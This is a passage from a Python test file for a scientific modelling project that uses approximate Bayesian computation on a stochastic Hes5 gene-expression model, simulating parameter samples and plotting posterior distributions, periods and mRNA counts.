model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))
my_posterior_samples = prior_samples[accepted_indices]
# plot distribution of accepted parameter samples
data_frame = pd.DataFrame( data = my_posterior_samples,
columns= ['transcription_rate',
'translation_rate',
'repression_threshold',
'transcription_delay'])
pairplot = sns.pairplot(data_frame)
# pairplot.map_diag(sns.kdeplot)
# pairplot.map_diag(sns.distplot, kde = False, rug = True)
# pairplot.map_offdiag(sns.kdeplot, cmap="Blues_d", n_levels=10)
# pairplot.map_offdiag(sns.jointplot )
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_bands_' + str(total_number_of_samples) + '_'
+ str(acceptance_ratio) + '.pdf'))
def xest_make_langevin_abc(self):
## generate posterior samples
total_number_of_samples = 20000
# total_number_of_samples = 20
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_langevin_200reps',
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEquals(my_prior_samples.shape,
(total_number_of_samples, 4))
def xest_make_langevin_abc_different_prior(self):
## generate posterior samples
total_number_of_samples = 20000
prior_bounds = {'basal_transcription_rate' : (0,10),
'translation_rate' : (0,200),
'repression_threshold' : (0,150000),
'time_delay' : (5,40)}
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 100,
saving_name = 'sampling_results_langevin_small_prior',
prior_bounds = prior_bounds,
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEquals(my_prior_samples.shape,
(total_number_of_samples, 4))
def xest_make_abc_all_parameters(self):
## generate posterior samples
total_number_of_samples = 20000
prior_bounds = {'basal_transcription_rate' : (0,100),
'translation_rate' : (0,200),
'repression_threshold' : (0,150000),
'time_delay' : (5,40),
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
'mRNA_degradation_rate': (0.001, 0.04),
'protein_degradation_rate': (0.001, 0.04)}
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_all_parameters_200',
prior_bounds = prior_bounds,
prior_dimension = 'full',
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEquals(my_prior_samples.shape,
(total_number_of_samples, 6))
def xest_make_hill_abc(self):
## generate posterior samples
total_number_of_samples = 20000
# total_number_of_samples = 10
prior_bounds = {'basal_transcription_rate' : (0,100),
'translation_rate' : (0,200),
'repression_threshold' : (0,100000),
'time_delay' : (5,40),
'hill_coefficient': (2,7)}
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
# 'mRNA_degradation_rate': (0.001, 0.04),
# 'protein_degradation_rate': (0.001, 0.04),
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_hill',
prior_bounds = prior_bounds,
prior_dimension = 'hill',
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEquals(my_prior_samples.shape,
(total_number_of_samples, 5))
def xest_pairplot_prior(self):
total_number_of_samples = 200000
prior_bounds = {'basal_transcription_rate' : (0.1,60),
'translation_rate' : (1,40),
'repression_threshold' : (0,120000),
'time_delay' : (5,40),
'hill_coefficient': (2,6)}
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
# 'mRNA_degradation_rate': (0.001, 0.04),
# 'protein_degradation_rate': (0.001, 0.04),
prior_samples = hes5.generate_prior_samples( total_number_of_samples, True,
prior_bounds, 'hill', True)
# pairplot = hes5.plot_posterior_distributions(prior_samples)
# pairplot.savefig(os.path.join(os.path.dirname(__file__),
# 'output','pairplot_log_prior.pdf'))
prior_samples[:,2]/=10000
data_frame = pd.DataFrame( data = prior_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient'])
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(151)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,np.log10(60.0),20)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,np.log10(60.0))
plt.ylabel("Probability", labelpad = 20)
plt.xlabel("Transcription rate \n [1/min]")
plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
plt.gca().set_ylim(0,1.0)
plt.xticks([-1,0,1], [r'$10^{-1}$',r'$10^0$',r'$10^1$'])
# plt.yticks([])
my_figure.add_subplot(152)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,np.log10(40),20)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,np.log10(40))
plt.gca().set_ylim(0,1.3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1], [r'$10^0$',r'$10^1$'])
plt.xlabel("Translation rate \n [1/min]")
plt.gca().set_ylim(0,2.0)
# plt.yticks([])
my_figure.add_subplot(153)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
plt.gca().set_ylim(0,0.22)
plt.gca().set_xlim(0,12)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(154))
time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = time_delay_bins)
plt.gca().set_xlim(5,40)
# plt.gca().set_ylim(0,0.035)
plt.gca().set_ylim(0,0.04)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel(" Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(155))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.gca().set_ylim(0,0.35)
plt.gca().set_xlim(2,6)
plt.gca().locator_params(axis='x', tight = True, nbins=3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
# plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','fixed_prior.pdf'))
def xest_make_abc_logarithmic_prior_vary_bounds(self):
## generate posterior samples
total_number_of_samples = 20000
# total_number_of_samples = 10
prior_bounds = {'basal_transcription_rate' : (0.1,100),
'translation_rate' : (1,200),
'repression_threshold' : (0,100000),
'time_delay' : (5,40),
'hill_coefficient': (2,6)}
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
# 'mRNA_degradation_rate': (0.001, 0.04),
# 'protein_degradation_rate': (0.001, 0.04),
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_logarithmic',
prior_bounds = prior_bounds,
prior_dimension = 'hill',
logarithmic = True,
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEquals(my_prior_samples.shape,
(total_number_of_samples, 5))
def xest_make_abc_logarithmic_prior(self):
## generate posterior samples
total_number_of_samples = 200000
# total_number_of_samples = 10
prior_bounds = {'basal_transcription_rate' : (0.1,100),
'translation_rate' : (1,200),
'repression_threshold' : (0,100000),
'time_delay' : (5,40),
'hill_coefficient' : (2,6)}
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
# 'mRNA_degradation_rate': (0.001, 0.04),
# 'protein_degradation_rate': (0.001, 0.04),
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_logarithmic',
prior_bounds = prior_bounds,
prior_dimension = 'hill',
logarithmic = True,
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEquals(my_prior_samples.shape,
(total_number_of_samples, 5))
def xest_plot_larger_variation(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
model_results[:,1]>0.3))) #standard deviation
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
print('coherences are')
print(model_results[accepted_indices][:,3])
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.diag_axes[0].set_ylim(0,10)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_larger_amplitude.pdf'))
def xest_plot_smaller_mean(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>5500, #cell number
np.logical_and(model_results[:,0]<6500, #cell_number
# model_results[:,1]>0.3))) #standard deviation
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.2))))) #standard deviation
# prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
print('coherences are')
print(model_results[accepted_indices][:,3])
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.diag_axes[0].set_ylim(0,1000)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_small_mean.pdf'))
def xest_plot_large_amplitude_trace(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
model_results[:,1]>0.3))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
this_parameter = my_posterior_samples[1]
this_trace = hes5.generate_langevin_trajectory( duration = 1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
hill_coefficient = this_parameter[4],
initial_protein = this_parameter[2],
equilibration_time = 1000
)
plt.figure(figsize = (4.5,2.5))
plt.plot(this_trace[:,0], this_trace[:,2]/1e4)
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','large_amplitude_example.pdf'))
def xest_plot_logarithmic_prior_bands(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
prior_samples[:,1]<10))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.diag_axes[0].set_ylim(0,1000)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_logarithmic_bands.pdf'))
def xest_plot_logarithmic_prior_oscillating(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.3))))) #coherence
# prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.diag_axes[0].set_ylim(0,30)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_logarithmic_oscillating.pdf'))
def xest_plot_logarithmic_prior_not_oscillating(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05,
np.logical_and(model_results[:,1]>0.05, #standard deviation
np.logical_and(prior_samples[:,1]<10, #time_delay
model_results[:,3]>0.3)))))) #coherence
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.diag_axes[0].set_ylim(0,30)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_logarithmic_not_oscillating.pdf'))
def xest_plot_period_distribution_logarithmic_prior(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[:,2]
plt.hist(all_periods, range = (0,600), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_full_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_full_mrna_distribution.pdf'))
# accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
# np.logical_and(model_results[:,0]<65000, #cell_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# np.logical_and(model_results[:,1]>0.05,
# model_results[:,3]>0.1))))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
#
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
my_figure = plt.figure(figsize = (4,2.5))
all_periods = my_model_results[:,2]
plt.hist(all_periods, range = (0,600), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_abc_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = my_model_results[:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_abc_mrna_distribution.pdf'))
def xest_plot_period_distribution_for_poster(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
prior_samples[:,1]<10))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
# real_data = [ 6.4135025721, 6.9483225932, 2.6887457703, 3.8620874625, 3.2559540745,
# 4.4568030424, 5.2120783369, 4.3169191105, 4.2472576997, 2.7684001434,
# 3.6331949226, 5.365000329, 1.1181243755, 4.2130976958, 6.3381760719,
# 2.466899605, 4.7849990718, 5.2029517316, 4.2038143391, 3.9909362984,
# 3.2734490618, 4.3116631965, 5.3199423883]
## the values that verionica sent initially
#
real_data = [2.0075009033, 5.1156200644, 7.7786868129, 6.4328452748, 7.441794935,
7.0127707313, 2.6890681359, 3.4454911902, 3.8689181126, 3.2493764293,
6.3817264371, 5.8903734106, 4.5034984657, 3.4247641996, 4.4767623623,
4.1803337503, 5.2752672662, 6.9038758003, 4.3200156205, 4.2588402084,
6.1428930891, 5.4124817274, 5.0135377758, 2.8156245427, 5.5008033408,
3.6331974295, 5.295813407, 1.1181243876, 5.5984263674, 4.2800118281,
6.7713656265, 3.4585300534, 6.3727670575, 2.4668994841, 6.3725171059,
4.8021898758, 4.8108333392, 5.9935335349, 6.2570622822, 5.2284704987,
4.2143881493, 4.0659270434, 3.9990674449, 4.4410420437, 6.7406002947,
5.0648853886, 1.8765732885, 3.307425174, 5.6208186717, 4.3185605778,
5.186842823, 5.6310823986, 7.4402931009]
sns.set(font_scale = 1.5)
font = {'size' : 28}
plt.rc('font', **font)
all_periods = my_model_results[:,2]
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
my_figure = plt.figure(figsize= (5,3))
sns.boxplot(data = [all_periods[all_periods<600], np.array(real_data)*60])
plt.xticks([0,1], ['Model', 'Experiment'])
plt.ylabel('Period [min]')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_period_distribution_for_poster.pdf'))
def xest_plot_period_distribution_for_coherences(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
my_figure = plt.figure(figsize = (6.5,6.5))
coherence_bands = [[0.0,1.0],
[0.0,0.1],
[0.1,0.2],
[0.2,0.3],
[0.3,0.4],
# [0.4,0.5]]
[0.4,0.5],
[0.5,0.6],
[0.6,0.7]]
for coherence_index, coherence_band in enumerate(coherence_bands):
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
np.logical_and(model_results[:,3]>coherence_band[0],
model_results[:,3]<coherence_band[1])))))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
my_figure.add_subplot(4,2,coherence_index + 1)
all_periods = my_model_results[:,2]
plt.hist(all_periods, range = (0,600), bins = 20)
plt.title(r'Coherence $\in$ '
+ np.array_str(np.array(coherence_band), precision=1))
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_abc_period_distribution_for_coherences.pdf'))
def xest_upsample_hill_abc(self):
## generate posterior samples
total_number_of_samples = 200000
# total_number_of_samples = 10
prior_bounds = {'basal_transcription_rate' : (0,4),
'translation_rate' : (0,200),
'repression_threshold' : (0,100000),
'time_delay' : (5,40),
'hill_coefficient': (2,7)}
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
# 'mRNA_degradation_rate': (0.001, 0.04),
# 'protein_degradation_rate': (0.001, 0.04),
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_hill_low_transcription',
prior_bounds = prior_bounds,
prior_dimension = 'hill',
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEquals(my_prior_samples.shape,
(total_number_of_samples, 5))
def xest_make_abc_all_parameters_long_delay(self):
## generate posterior samples
total_number_of_samples = 20000
prior_bounds = {'basal_transcription_rate' : (0,100),
'translation_rate' : (0,200),
'repression_threshold' : (0,150000),
'time_delay' : (20,40),
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
'mRNA_degradation_rate': (0.001, 0.04),
'protein_degradation_rate': (0.001, 0.04)}
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 100,
saving_name = 'sampling_results_all_parameters_long_delay',
prior_bounds = prior_bounds,
prior_dimension = 'full',
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEquals(my_prior_samples.shape,
(total_number_of_samples, 6))
def xest_plot_langevin_abc_differently(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
acceptance_ratio = 0.02
total_number_of_samples = 20000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
distance_table = hes5.calculate_distances_to_data(model_results)
my_posterior_samples = hes5.select_posterior_samples( prior_samples,
distance_table,
acceptance_ratio )
self.assertEquals(my_posterior_samples.shape,
(int(round(total_number_of_samples*acceptance_ratio)), 4))
# plot distribution of accepted parameter samples
data_frame = pd.DataFrame( data = my_posterior_samples,
columns= ['transcription_rate',
'translation_rate',
'repression_threshold',
'transcription_delay'])
sns.set()
pairplot = sns.pairplot(data_frame)
# pairplot.map_diag(sns.kdeplot)
# pairplot.map_diag(sns.distplot, kde = False, rug = True)
# pairplot.map_offdiag(sns.kdeplot, cmap="Blues_d", n_levels=10)
# pairplot.map_offdiag(sns.jointplot )
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_dots_langevin_' + str(total_number_of_samples) + '_'
+ str(acceptance_ratio) + '.pdf'))
def xest_plot_full_abc_in_band(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters_200')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
sns.set()
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_all_parameters.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[accepted_indices][:,2]
plt.hist(all_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_full_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[accepted_indices][:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_full_mrna_distribution.pdf'))
def xest_plot_abc_all_parameters_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters_200')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]>0.3))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_all_parameters_oscillating.pdf'))
def xest_plot_abc_all_parameters_not_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters_200')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]<0.2))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_all_parameters_not_oscillating.pdf'))
def xest_plot_full_abc_in_band_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters_long_delay')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_full_bands_long_delay.pdf'))
## need to rerun abc with mrna numbers
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[accepted_indices][:,2]
plt.hist(all_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_full_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[accepted_indices][:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_full_mrna_distribution.pdf'))
def xest_plot_full_abc_not_oscillating_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters_long_delay')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
np.logical_and(model_results[:,3]<0.3, #coherence
prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_full_long_delay_not_oscillating.pdf'))
def xest_plot_full_abc_oscillating_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters_long_delay')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
np.logical_and(model_results[:,3]>0.3, #coherence
prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_full_long_delay_oscillating.pdf'))
def xest_plot_langevin_abc_in_band_not_oscillating_different_prior(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_small_prior')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
